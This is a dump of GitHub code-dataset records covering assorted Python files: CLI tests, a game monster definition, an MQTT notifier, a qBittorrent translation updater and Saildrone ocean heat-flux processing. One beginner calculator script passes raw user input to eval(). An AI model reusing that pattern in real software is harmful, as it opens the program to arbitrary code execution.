wrap\n","repo_name":"minute-tech/flask-dev.minute.tech","sub_path":"minutetech/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40916170026","text":"#변수\nanswer =0\n#메인\n\nselect = int(input (\"1. 입력한 수식계산 \\n2. 두수 사이의 합계\\n:\"))\n\nif select == 1:\n numStr =input (\"***수식을 입력하세요:\")\n answer = eval (numStr)\n print(\"%s 결과는 %5.1f입니다..\" %(numStr,answer))\n\nelif select == 2 :\n num1 =int(input(\"***첫번쨰 숫자를 입력하세요: \"))\n num2 =int(input(\"***두번쨰 숫자를 입력하세요: \"))\n for i in range (num1,num2+1):\n answer = answer+i\n print(\"%d +......%d는 %d입니다.\"%(num1,num2,answer))\n\nelse:\n print(\"1또는 2만 입력해야 합니다.\")\n","repo_name":"dgl1231/python_practice","sub_path":"python_practice_06/plus.py","file_name":"plus.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16514830327","text":"import pytest\nfrom typer.testing import CliRunner\n\nfrom script import app\n\n@pytest.fixture\ndef runner() -> CliRunner:\n return CliRunner()\n\n@pytest.mark.parametrize(\"a,b, c\", (\n (2,1,1),\n (2,2,0),\n (2,4,-2),\n (0,0,0),\n# (-2,-2,0) DOES NOT WORK WITH ARGUMENTS NUMBERS\n))\ndef test_app_subtract(runner, a, b, c):\n result = runner.invoke(app, [\"subtract\", f\"{a}\", f\"{b}\"])\n assert result.exit_code == 0\n assert result.stdout == f\"The delta is {c}\\n\"\n\n@pytest.mark.parametrize(\"c,d, evaluation\", (\n (2,1,\"not greater\"),\n (2,2,\"not greater\"),\n (2,4,\"greater\"),\n))\ndef test_app_compare(runner, c, d, evaluation):\n format = \"d={} is {} than c={}\\n\"\n result = runner.invoke(app, [\"compare\", f\"{c}\", f\"{d}\"])\n assert result.exit_code == 0\n assert result.stdout == format.format(d,evaluation,c)\n\ndef test_app_help_compare(runner):\n result = runner.invoke(app, [\"compare\", \"--help\"])\n assert result.exit_code == 0\n assert \"Command that checks whether a number d is greater than a number c\" in result.output\n assert \"First number to compare against\" in result.output\n assert \"Second number that is compared against first number\" in result.output\n\ndef test_app_help_subtract(runner):\n result = runner.invoke(app, [\"subtract\", \"--help\"])\n assert result.exit_code == 0\n assert \"Command that allows you to add two numbers.\" in result.output\n assert \"The value of the first summand\" in result.output\n assert \"The value of the second summand\" in result.output\n\n\n@pytest.mark.parametrize(\"args\", ([], [\"1\"]),)\n@pytest.mark.parametrize(\"command\", (\"subtract\", \"compare\"),)\ndef test_app_missing_args(runner,command, args):\n result = runner.invoke(app, [command]+args)\n assert result.exit_code == 2\n assert \"Missing argument\" in result.output","repo_name":"Pijukatel/PyBites","sub_path":"359/test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73198656361","text":"Valkyrie = genMonster(\"Valkyrie\", (139, 6080), \"a Valkyrie\")\nValkyrie.setOutfit(113, 57, 95, 113)\nValkyrie.setTargetChance(10)\nValkyrie.bloodType(\"blood\")\nValkyrie.setHealth(190)\nValkyrie.setExperience(85)\nValkyrie.setSpeed(176) # Correct\nValkyrie.walkAround(1,1,1) # energy, fire, poison\nValkyrie.setBehavior(summonable=450, hostile=1, illusionable=1, convinceable=450, pushable=0, pushItems=1, pushCreatures=0, targetDistance=1, runOnHealth=10)\nValkyrie.voices(\"Another head for me!\", \"Head off!\", \"Your hea will be mine!\", \"Stand still!\", \"One more head for me!\")\nValkyrie.setImmunity(0,0,0) # paralyze, invisible, lifedrain\nValkyrie.setDefense(13, fire=0.9, earth=1.0, energy=1.0, ice=0.9, holy=0.95, death=1.05, physical=1.1, drown=1.0)\nValkyrie.regMelee(70)\nValkyrie.regDistance(40, ANIMATION_SPEAR, chance(21))\nValkyrie.loot( (\"girlish hair decoration\", 5.5), (\"red apple\", 11.5, 2), (\"hunting spear\", 4.75), (\"meat\", 29.75, 3), (2148, 100, 12), (\"spear\", 100, 3), (\"chain armor\", 8.0), (\"protective charm\", 2.75), (\"plate armor\", 1.25), (\"skull\", 0.5), (\"protection amulet\", 0.75), (\"double axe\", 0.25), (\"health potion\", 0.25) )","repo_name":"novasdream/PyOT","sub_path":"data/monsters/Humans/Amazons/Valkyrie.py","file_name":"Valkyrie.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"7422727261","text":"class Worker:\n def __init__(self, name, surname, position='уборщик'):\n self.name, self.surname, self.position = name, surname, position\n self._income = {'директор': {'Оклад': 70000, 'Премия': 20000},\n 'офисный клерк': {'Оклад': 40000, 'Премия': 5000},\n 'уборщик': {'Оклад': 20000, 'Премия': 1000}}\n self.positions = []\n for i in self._income.keys():\n self.positions.append(i)\n\n\nclass Position(Worker):\n def get_full_name(self):\n return f'{self.name} {self.surname}'\n\n def get_total_income(self):\n if self.positions.count(self.position) >= 1:\n result = self._income[self.position]\n return result['Оклад'] + result['Премия']\n else:\n return 'Нет такой должности'\n\n\nstuff = Position('Василий', 'Лентюгов', 'директор')\nprint(stuff.get_full_name())\nprint(stuff.get_total_income())\n","repo_name":"NickHlzv/Python","sub_path":"Lesson6.Homework/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"438204042","text":"\"\"\" Handles displaying the image preview \"\"\"\nimport wx\n\n\nclass ImagePreview(wx.Panel):\n def __init__(self, parent: wx.Window=None):\n \"\"\" Creates an image preview with the specified parent window \"\"\"\n super(ImagePreview, self).__init__(parent, id=wx.ID_ANY)\n self.parent = parent\n self.bitmap = None\n self.draw_bitmap = None\n self.image = None\n self.background_color = wx.BLACK_BRUSH\n width, height = self.GetClientSize()\n self.buffer = wx.Bitmap(width, height)\n\n # load the background color from the parent\n if parent is not None:\n self.background_color = wx.Brush(parent.GetBackgroundColour())\n\n self.SetDoubleBuffered(True)\n self.update_bitmap()\n self.Bind(wx.EVT_PAINT, self.on_paint)\n self.Bind(wx.EVT_SIZE, self.on_resize)\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.on_erase)\n\n def update_bitmap(self):\n \"\"\" Updates the bitmap or image data to fit the screen \"\"\"\n if self.image is not None: # there is a valid image\n image = self.image\n elif self.bitmap is not None: # there was only a bitmap provided\n image = self.bitmap.ConvertToImage()\n else:\n image = None\n\n # redraw the buffer\n dc = wx.MemoryDC(self.buffer)\n dc.SelectObject(self.buffer)\n dc.SetBackground(self.background_color)\n dc.Clear()\n\n # draw the image if it's valid\n if image is not None:\n # scale the image to the client dimensions and try to contain the aspect ratio\n width, height = image.GetWidth(), image.GetHeight()\n client_width, client_height = self.GetClientSize()\n\n # resize with aspect ratio\n if client_width < width or client_height < height:\n scale = float(client_width) / width\n\n if scale > float(client_height) / height:\n scale = float(client_height) / height\n\n new_w, new_h = int(width * scale), int(height * scale)\n if new_w < 1:\n new_w = 1\n if new_h < 1:\n new_h = 1\n\n image = image.Scale(new_w, new_h, wx.IMAGE_QUALITY_HIGH)\n\n # draw the bitmap in the center of the screen\n self.draw_bitmap = image.ConvertToBitmap()\n self.center_coords = int((client_width - self.draw_bitmap.GetWidth()) // 2), int((client_height - self.draw_bitmap.GetHeight()) // 2)\n dc.DrawBitmap(self.draw_bitmap, *self.center_coords)\n\n del dc # push the updates to the buffer\n\n # push the buffer to the screen\n self.Refresh(False)\n\n def set_bitmap(self, bitmap):\n \"\"\" Updates the bitmap\n\n :param bitmap: the wx.Bitmap or wx.Image object\n \"\"\"\n if isinstance(bitmap, wx.Image):\n self.image = bitmap\n self.bitmap = None\n else:\n self.bitmap = bitmap\n self.image = None\n self.update_bitmap()\n\n def set_background_color(self, color):\n \"\"\" Set the background color of the area that isn't exposed by the image\n\n :param color: the wx Color object\n \"\"\"\n self.background_color = wx.Brush(color)\n self.update_bitmap()\n\n def on_erase(self, event):\n \"\"\" Handle the erase background event \"\"\"\n pass\n\n def on_resize(self, event):\n \"\"\" Handles the resizing of the window \"\"\"\n width, height = self.GetClientSize()\n self.buffer = wx.Bitmap(width, height)\n self.update_bitmap()\n\n def on_paint(self, event):\n \"\"\" Periodic paint event \"\"\"\n wx.BufferedPaintDC(self, self.buffer)\n","repo_name":"smerkousdavid/membrane-analysis","sub_path":"structure/interactive/gui/image_preview.py","file_name":"image_preview.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17071434460","text":"#!/usr/bin/env python3\nfrom pymoos import pymoos\nimport time\n\nclass printerMOOS(pymoos.comms):\n \"\"\"printerMOOS is an example python MOOS app.\n\n Attributes:\n moos_community: a string representing the address of the Community\n moos_port: an interger defining the port\n \"\"\"\n def __init__(self, moos_community, moos_port):\n \"\"\"Initiates MOOSComms, sets the callbacks and runs the loop\"\"\"\n super(printerMOOS, self).__init__()\n self.server = moos_community\n self.port = moos_port\n self.name = 'printerMOOS'\n self.iter = 0\n\n self.set_on_connect_callback(self.__on_connect)\n self.set_on_mail_callback(self.__on_new_mail)\n self.run(self.server, self.port, self.name)\n\n def __on_connect(self):\n \"\"\"OnConnect callback\"\"\"\n print(\"Connected to\", self.server, self.port,\n \"under the name \", self.name)\n return self.register('SPHINX_SR', 0)\n\n def __on_new_mail(self):\n \"\"\"OnNewMail callback\"\"\"\n for msg in self.fetch():\n if msg.key() == \"SPHINX_SR\":\n print(\"SPHINX heard:\" + msg.string())\n elif msg.key() == \"GOOGLE_SR\":\n print(\"GOOGLE heard:\" + msg.string())\n return True\n\n\n\ndef main():\n prntr = printerMOOS('localhost', 9000)\n\n while True:\n time.sleep(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"moos-tutorials/python-moos-tutorials","sub_path":"04-speech-recognition/printer.py","file_name":"printer.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"31534340420","text":"from SphericalHarmonics import SphericalHarmonics, read_code\nimport numpy as np\nfrom timeit import default_timer as timer\n\nresolution=400\ncolorMap = 8\ncode = 0\n\nt = timer()\ncoords = SphericalHarmonics(resolution, colorMap, code) # res, colorMap index, code\nprint('lap:', timer()-t)\n\nnpcoords = np.array(coords)\nprint('coords:', npcoords[0][:10], '\\nnormals:', npcoords[1][:10], '\\ncolors:', npcoords[2][:10], '\\ntextures:', npcoords[3][:10])\n\nnew_coords = read_code(code)\nprint(np.all(npcoords==np.array(new_coords)))\nexit(1)\n","repo_name":"rforcen/SphericalHarmonicsMetalPython","sub_path":"SphericalHarmonicsMetal/testSH.py","file_name":"testSH.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24064344920","text":"#import os\n#import glob\nfrom pathlib import Path\nimport numpy as np\nimport logging\nimport sys\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s [%(levelname)s] %(message)s\",\n handlers=[\n #logging.FileHandler(\"Logging.log\"),\n logging.StreamHandler(sys.stdout)\n ])\n\n# def getFileList(Settings):\n# Settings['parent_directory']=Path(__file__).parent \n# if Settings['filename'] == '':\n# Settings['filelist']=glob.glob(str(Path(Settings['parent_directory'],'*.srs'))) \n# else: \n# Settings['filelist']=Settings['filename']\n# return Settings\n\nclass srsFile:\n def __init__(self,filename):\n self.Filename=Path(filename)\n self.Data={}\n self.Spec_Pts = np.fromfile(self.Filename, dtype=np.int32 , count=1, offset=14036)[0]\n self.Max_Wn = np.fromfile(self.Filename, dtype=np.single , count=1, offset=14048)[0]\n self.Min_Wn = np.fromfile(self.Filename, dtype=np.single , count=1, offset=14052)[0]\n info_raw=np.fromfile(self.Filename, dtype='S1',count=318, offset=15232)\n self.info=''\n for b in info_raw:\n self.info=self.info+b.decode('ascii')\n del b \n \n\n def getData(self,No_Avg=200,Header_Size=25,Footer_Size=25,Start_of_Data=49232,Percent=False,M_No=500):\n# Start_of_Data=49232 #4226*4 #original Value from Matlab script: 16904\n# Default Values must be adjusted to current experiment!\n \n f=Path(self.Filename)\n logging.info(f'Get Data from {f}.') \n \n Wn=np.linspace(self.Min_Wn, self.Max_Wn, num=self.Spec_Pts)\n spectra=[]\n time=[]\n\n bg=np.fromfile(f, dtype=np.single , count=self.Spec_Pts, offset= 16904 + 4*(Header_Size))\n \n i=0\n \n s=np.fromfile(f, dtype=np.single , count=self.Spec_Pts, offset= Start_of_Data+4*(Header_Size))\n scr=np.fromfile(f, dtype=np.uint, count=2, offset= Start_of_Data)\n s_count=1\n \n while scr.shape[0]>1 and scr[0]==No_Avg and i\\n'\n b'\\n')\n tree.write(file, encoding = 'utf-8')\n except Exception:\n print('\\tFailed to write %s!' % (os.path.normpath(filename)))\n\nargp = argparse.ArgumentParser(\n prog = 'tstool.py', description = 'Update qBittorrent WebUI translation files.')\nargp.add_argument('--no-obsolete', dest = 'no_obsolete', action = 'store_true',\n default = no_obsolete,\n help = 'remove obsolete messages (default: mark them as obsolete)')\nargp.add_argument('--www-folder', dest = 'www_folder', action = 'store',\n default = www_folder,\n help = 'folder with WebUI source files (default: \"%s\")' % (www_folder))\nargp.add_argument('--ts-folder', dest = 'ts_folder', action = 'store',\n default = ts_folder,\n help = 'folder with WebUI translation files (default: \"%s\")' % (ts_folder))\n\nargs = argp.parse_args()\nno_obsolete = args.no_obsolete\nwww_folder = args.www_folder\nts_folder = args.ts_folder\n\nprint(\"Processing source files...\")\nnfiles = 0\nsource_ts = {}\nfor root, dirs, files in os.walk(www_folder):\n for file in files:\n if os.path.splitext(file)[-1] in accepted_exts:\n parseSource(os.path.join(root, file), source_ts)\n nfiles += 1\n\nif nfiles == 0:\n print(\"No source files found!\")\n sys.exit()\n\nnstrings = sum(len(sublist) for sublist in source_ts)\nprint(\"Found %d strings within %d contexts.\" % (nstrings, len(source_ts)))\nprint(\"\")\n\nprint(\"Processing translation files...\")\nfor entry in os.scandir(ts_folder):\n if (entry.is_file() and entry.name.startswith('webui_')\n and entry.name.endswith(\".ts\")):\n processTranslation(entry.path, copy.deepcopy(source_ts))\n\nprint(\"Done!\")\n","repo_name":"qbittorrent/qBittorrent","sub_path":"src/webui/www/tstool.py","file_name":"tstool.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","stars":22861,"dataset":"github-code","pt":"18"} +{"seq_id":"26050025001","text":"def func(a, b):\n flag = 0\n for i in a:\n for j in b:\n if i == j:\n flag = 1\n print(f\"{i} is common\")\n break\n if flag == 0:\n print(\"Nothing is common\")\n\n\na = [1, 2, 3, 4, 5]\nb = [5, 6, 7, 8, 9]\n\nc = [1, 2, 3, 4, 5]\nd = [6, 7, 8, 9]\n\ne = [1, 2, 3, 4, 50, 9]\n\nfunc(b, e)\n\n\n# 2.converting into a set would be one more solution. because we can use intersection (&) to get the\n# common values between two sets.\ndef has_common_elements(a, b):\n first = set(a)\n second = set(b)\n\n if first & second:\n return True\n else:\n return False\n\n\nprint(has_common_elements(c, d))\n\n\n# 3. using set and intersection method.\ndef has_common_elements1(a, b):\n first = set(a)\n second = set(b)\n\n return len(first.intersection(second)) > 0\n\n\nprint(has_common_elements1(a, b))\n\n\n\n","repo_name":"Sudipta0102/PyBasic","sub_path":"02.DataTypes/Exercise/ListEx/05.CheckTwoListsHaveAt-leastOneElementCommon.py","file_name":"05.CheckTwoListsHaveAt-leastOneElementCommon.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1320838770","text":"# coding: utf-8\nfrom typing import List\nfrom typing import Union\n\nfrom jira_redmine.base.resources.project import Project\nfrom jira_redmine.jira.converter import Converter\nfrom jira_redmine.jira.managers.base import BaseJiraManager\n\n\nclass ProjectManager(BaseJiraManager):\n \"\"\"Менеджер доступа к проектам Jira.\"\"\"\n\n def get_all(self) -> List[Project]:\n \"\"\"Получить все проекты.\"\"\"\n projects = self._client.projects()\n return [Converter.get_project(project) for project in projects]\n\n def get(self, project_id: Union[int, str]) -> Project:\n \"\"\"Получить проект по идентификатору.\"\"\"\n project = self._get_or_raise('project', project_id, Project)\n return Converter.get_project(project)\n\n def create(self, project: Project) -> Project:\n \"\"\"Создать новый проект.\"\"\"\n jira_project = self._client.create_project(\n key=project.key,\n name=project.name,\n description=project.description,\n assignee=project.creator.key,\n )\n return self.get(jira_project.key)\n","repo_name":"vm85/jira_redmine","sub_path":"src/jira_redmine/jira/managers/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29186298518","text":"#!/usr/bin/env python\n\nimport json\nimport paho.mqtt.client as paho\nimport ssl\nimport sys\nfrom os import path\n\nclass Ding():\n mqtt = None\n\n def __init__(self, mqtt=None):\n self.mqtt_config = mqtt or self.load_config()['mqtt']\n self.mqtt = paho.Client()\n\n def load_config(self=None, config_file_name=\"~/.ding.conf\"):\n config = {}\n config_file_path = path.expanduser(config_file_name)\n with open(config_file_path) as config_file:\n config = json.load(config_file)\n return config\n\n def connect(self):\n self.mqtt.username_pw_set(self.mqtt_config['username'], self.mqtt_config['password'])\n if 'ca_certs' in self.mqtt_config:\n self.mqtt.tls_set(self.mqtt_config['ca_certs'], tls_version=ssl.PROTOCOL_TLSv1_2)\n self.mqtt.connect(self.mqtt_config['host'], self.mqtt_config['port'])\n\n def ding(self, message=None):\n topic = self.mqtt_config['topic']\n if not message:\n message = \"ding\"\n topic += '/' + message\n self.mqtt.publish(topic)\n\n def loop_forever(self):\n self.mqtt.loop_forever()\n\n def disconnect(self):\n self.mqtt.disconnect()\n\ndef main():\n ding = None\n if len(sys.argv) > 2:\n print(\"usage: %s [keyword]\" % sys.argv[0])\n sys.exit(1)\n\n ding = Ding()\n ding.connect()\n\n message = None\n if len(sys.argv) > 1:\n message = sys.argv[1]\n ding.ding(message)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"xxv/ding","sub_path":"ding.py","file_name":"ding.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"73270993319","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport astropy.io.fits as fits\nimport os.path\n\n#if os.path.exists(\"/bc03/Miles_Atlas/Kroupa_IMF/\"):\n# path = os.path.dirname(os.path.realpath(__file__))\npath = \"bc03/Miles_Atlas/Kroupa_IMF/\"\ngen_file = str(path) + \"bc2003_hr_xmiless_m62_kroup_ssp.ised_ASCII\"\n\n\nage_bc03 = np.loadtxt(gen_file, max_rows = 1, dtype=float)\n\nages = np.array(age_bc03[1:222])\n\n\nlambda_bc03 = np.genfromtxt(gen_file, skip_header=6, skip_footer=233, dtype=float)\nlambda_ = np.array(lambda_bc03)\n\nwavelengths = lambda_[1:]\n\ndef spectrum():\n models = [\"m22\",\"m32\", \"m42\",\"m52\", \"m62\", \"m72\", \"m82\"]\n\n flux_grid =[]\n\n for Z in models:\n\n file = str(path)+\"bc2003_hr_xmiless_\"+str(Z)+\"_kroup_ssp.ised_ASCII\"\n\n flux_models = np.genfromtxt(file, skip_header=7, skip_footer=12, dtype=float)\n\n\n flux_grid.append(flux_models[:,1:13217])\n\n #print(flux_grid.shape)\n\n return ages, wavelengths, flux_grid\n\n#new_wavs = np.arange(1000., 70000., 10.)\n#new_fluxes = spectres.spectres(new_wavs, lambda_[1:], fluxes)\n\n\n\n#print(len(flux_grid))\n#import pickle\n\n#arr = {'ages': ages, 'wavelengths': wavelengths, 'fluxes':flux_grid}\n\n#print(arr)\n#pickle.dump( arr, open( \"awf_spec.p\", \"wb\" ))\n\n#file = pickle.load( open( \"awf_spec.p\", \"rb\" ) )\n#ages, waves,flux_grid = spectrum()\n#ages = np.array(ages)\n#print(file['fluxes'])\n#models = flux_grid\n\n#print(models[0:5])\n\n#fits.writeto(\"awf_spec.p\", arr)\n","repo_name":"MLHamadouche/sed_fitting_code","sub_path":"spec_fluxes.py","file_name":"spec_fluxes.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"3782441723","text":"from langchain.chains.summarize import load_summarize_chain\nfrom langchain.chains import LLMChain\nfrom langchain_custom.staff_report import summarize_prompt, style_trans_prompt\n\nfrom langchain_custom.staff_report.llm import GLM\nfrom utils.text_loader import txt_loader, str_loader\n\n\nmodel_path = \"C:\\\\Users\\\\59700\\\\Documents\\\\_Personals_local\\\\models\\\\chatglm2-6b\"\nllm = GLM()\nllm.load_model(model_path=model_path)\n\n\ndocs = txt_loader(\"./docs/1.txt\", chunk_size=500)\ndocs = str_loader(\"12\", chunk_size=500)\n\n\nchain_summ = load_summarize_chain(\n llm, \n chain_type=\"map_reduce\", \n return_intermediate_steps=True, \n map_prompt=summarize_prompt.PROMPT,\n combine_prompt=summarize_prompt.PROMPT,\n)\n\nchain_styletrans = LLMChain(llm=llm, prompt=style_trans_prompt.PROMPT)\n\nsumm = chain_summ({\"input_documents\": docs}, return_only_outputs=True)\noutput = chain_styletrans.run(text=summ['output_text'])\n\n\nchain_summ_single = LLMChain(llm=llm, prompt=summarize_prompt.PROMPT)\nfrom tqdm import tqdm\nsummary_paragraphs = ''\nfor doc in tqdm(docs):\n summary_paragraphs += chain_summ_single.run(doc)\n \nchain_summ_single.run(summary_paragraphs)","repo_name":"wheresmyhair/prompt-app-dev","sub_path":"__deprecated/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19082198700","text":"from django.db import models\n\nfrom accounts.models import CustomUser\n\nDEFAULT_SETTINGS = {\n \"currency\": \"USD\",\n \"language\": \"EN\"\n}\n\nCURRENCY_CHOICE = (\n (\"UAH\", \"₴\"),\n (\"USD\", \"$\"),\n (\"EUR\", \"€\")\n)\n\nLANGUAGE_CHOICE = (\n (\"EN\", \"English\"),\n (\"UA\", \"Ukrainian\")\n)\n\n\nclass Config(models.Model):\n \"\"\" Represents user's preferences. \"\"\"\n \n user = models.OneToOneField(CustomUser, related_name=\"config\", on_delete=models.CASCADE)\n currency = models.CharField(max_length=3, choices=CURRENCY_CHOICE, default=DEFAULT_SETTINGS[\"currency\"])\n language = models.CharField(max_length=56, choices=LANGUAGE_CHOICE, default=DEFAULT_SETTINGS[\"language\"])\n\n class Meta:\n verbose_name = \"config\"\n verbose_name_plural = \"configs\"\n\n def __str__(self):\n return f\"User[{self.user.profile.username}] | Config\"\n","repo_name":"antony-kosenko/moneyroam","sub_path":"preferences/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4102314837","text":"import sys\nsys.stdin = open('1520.txt')\nimport collections\n\n# 좌, 우, 상,\ndr = [0, 0, -1, 1]\ndc = [-1, 1, 0, 0]\n\n\ndef bfs():\n global cnt \n\n deq = collections.deque()\n deq.append((0, 0))\n \n while deq:\n row, col = deq.popleft()\n for w in range(4):\n if possible_map[row][col][w] == False:\n continue\n\n nr = row + dr[w]\n nc = col + dc[w]\n\n # if nr < 0 or nr >= N or nc < 0 or nc >= M:\n # continue\n\n if (nr, nc) == (N - 1, M - 1):\n cnt += 1\n \n deq.append((nr, nc))\n\n \nN, M = map(int, input().split())\nmap_list = [list(map(int, input().split())) for _ in range(N)]\n\npossible_map = [[[0, 0, 0, 0] for _ in range(M)] for _ in range(N)]\n\nfor row in range(N):\n for col in range(M):\n\n temp = map_list[row][col]\n for w in range(4):\n nr = row + dr[w]\n nc = col + dc[w]\n if 0 <= nr < N and 0 <= nc < M:\n if map_list[nr][nc] < temp:\n possible_map[row][col][w] = True\n continue\n \n possible_map[row][col][w] = False\n\ncnt = 0\nbfs()\nprint(cnt)","repo_name":"HwnagYoungJun/algorithm","sub_path":"2020/7월/0713/1520_내리막길_백준.py","file_name":"1520_내리막길_백준.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"73467797160","text":"############################ READ ME ######################\n#This code was written by Hanna Rosenthal to process Saildrone data from Sd1020, Sd1022, Sd1023 during the Circumnavigation of Antarctica in 2019\n# TEST \n# five main steps are done in this script: \n# 1. data is projected on continous time vector (in the \"raw\" dataset provided by Sd Inc. the time vektor was not continous)\n# 2. mask with nan all rows( times) where there is missing measurments of variables that are reqired for heat flux calculation\n# 3. 5min rolling mean for all variables to reduce effects bias by sudden platform motion \n# 4. sallinity despiked (threshold 0.1 PSU)\n# 5. sensible and latent bulk heat flux are calculated\n#\n# the results are saved as csv files \n# the following variables are saved 'latitude', 'longitude', 'pressure', 'airtemp', 'humidity', 'uwind', 'vwind', 'sst', 'salinity', 'wind', 'Q_sens', 'Q_lat', 'sensor_p',\n# 'density', 'dist_cov'(distance between measuments), 'dist_NZ' (track distance), 'alpha', 'beta', 'R', 'density_grad']\n\n\n####import packages \nimport pandas as pd\nimport SD_Project as SD\nimport numpy as np\nimport gsw\nimport seawater as sw\nimport xarray as xr\nimport datetime\n\nimport matplotlib.pyplot as plt\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\nprint('loaded packages')\n\n#data cleaning\n## load data in\n# import key variables from data sets \nnames_20=['latitude', 'longitude', 'BARO_PRES_MEAN', 'TEMP_AIR_MEAN', 'RH_MEAN', 'UWND_MEAN', 'VWND_MEAN', 'TEMP_CTD_MEAN', 'SAL_MEAN'] #variable names in Sd data set provided by SD Inc.\nnames_22=['latitude', 'longitude', 'BARO_PRES_MEAN', 'TEMP_AIR_MEAN', 'RH_MEAN', 'UWND_MEAN', 'VWND_MEAN', 'TEMP_CTD_RBR_MEAN', 'SAL_RBR_MEAN'] # variable names were diffrent for Sd1022/23 than Sd1020\nnames_new=['latitude', 'longitude', 'pressure', 'airtemp', 'humidity', 'uwind', 'vwind', 'sst', 'salinity'] #new easier names\n\n\nfilepath_20= 'data/Sd1020_data.nc'\nDS_20= xr.open_dataset(filepath_20)\nDS_20= DS_20.rename(dict(zip(names_20, names_new)))[names_new].squeeze('trajectory') #rename the variables to easier names and get grid of trjaectory dimension\n\nfilepath_22='data/Sd1022_data_merged.nc'\nDS_22= xr.open_dataset(filepath_22)\nDS_22= DS_22.rename(dict(zip(names_22, names_new)))[names_new]\n\nfilepath_23='data/Sd1023_data_merged.nc'\nDS_23= xr.open_dataset(filepath_23)\nDS_23= DS_23.rename(dict(zip(names_22, names_new)))[names_new]\n\nprint('uploaded data')\n\n# make time a coordinate and drop trajectory(except for 1020, there it is droped later) in each dataset\n# explaination: the time vector provided in the Sd datasets were not contious, this might differ in other SD datasets\nt_20 = DS_20['time'].values\ndf_20 = DS_20.to_dataframe()\ndf_20.index = t_20\ndf_20.index.names=['time']\ndf_20 = df_20.drop(columns=['time'])\n\ndf_22 = DS_22.to_dataframe().drop(columns=['trajectory'])\ndf_23 = DS_23.to_dataframe().drop(columns=['trajectory'])\n\ndef make_cont_timevector(df_index):\n '''df_index: dataframe index [datetime64[ns]], df.index \n output: contious timevector with same start and end date as dataframe '''\n import numpy as np\n td_full= (df_index[-1]- df_index[0])\n t_min= td_full.days*24*60\n td_rest= (df_index[-1]-np.timedelta64(td_full.days, 'D'))-df_index[0]\n t_min= t_min + td_rest.seconds//60\n \n date = np.array(df_index[0], dtype=np.datetime64)\n vec= date + pd.to_timedelta(np.arange(t_min+1), 'm')\n return vec\n\n# make contious time vectors for all three datasets, reproject onto this vector, fill with nans \ndf_cont={}\ndf= {'1020':df_20, '1022':df_22, '1023':df_23}\nfor frame in df:\n t_new= make_cont_timevector(df[frame].index)\n df_new= pd.DataFrame(index=t_new)\n df_new.index.names=['time']\n for var in df[frame].columns: \n df_new[var] = pd.Series(df[frame][var], index=df[frame].index)\n df[frame]=df_new\n\n# drop trajectory column for 1020 \ndf['1020'] = df['1020'].drop(columns=['trajectory'])\n\nprint('fixed time vectors')\n###calculate 5 min rolling mean of measurments \nfor d in df:\n df[d]['wind'] = SD.wind_to_ref_height(SD.wind(df[d]['uwind'],df[d]['vwind']), 3.6, 10) # correct wind speed to ref hight of 10m (height of wind sensor is needed here)\n df[d]['wind'] = df[d]['wind'].rolling(5, center=True).mean()\n df[d]['airtemp'] = df[d]['airtemp'].rolling(5, center=True).mean()\n df[d]['sst'] = df[d]['sst'].rolling(5, center=True).mean()\n df[d]['humidity'] = df[d]['humidity'].rolling(5, center=True).mean()\n df[d]['salinity'] = df[d]['salinity'].rolling(5, center=True).mean()\n df[d]['humidity'] = df[d]['humidity'].rolling(5, center=True).mean()\n df[d]['pressure'] = df[d]['pressure'].rolling(5, center=True).mean()\n \n df[d]['Q_sens'] = SD.Q_sensible(df[d]['wind'], df[d]['airtemp'], df[d]['sst']) #sensible bulk heat flux\n df[d]['Q_lat'] = -SD.Q_latent(df[d]['wind'], SD.humidity_spec_sat3(df[d]['humidity'], df[d]['airtemp'], df[d]['pressure']), SD.humidity_specific3(df[d]['humidity'], df[d]['airtemp'], df[d]['pressure'])) # latent bulk heat flux\n df[d]['salinity']= SD.despike_sal(df[d]['salinity'], 0.1) # remove sal spikes that are larger than 0.1 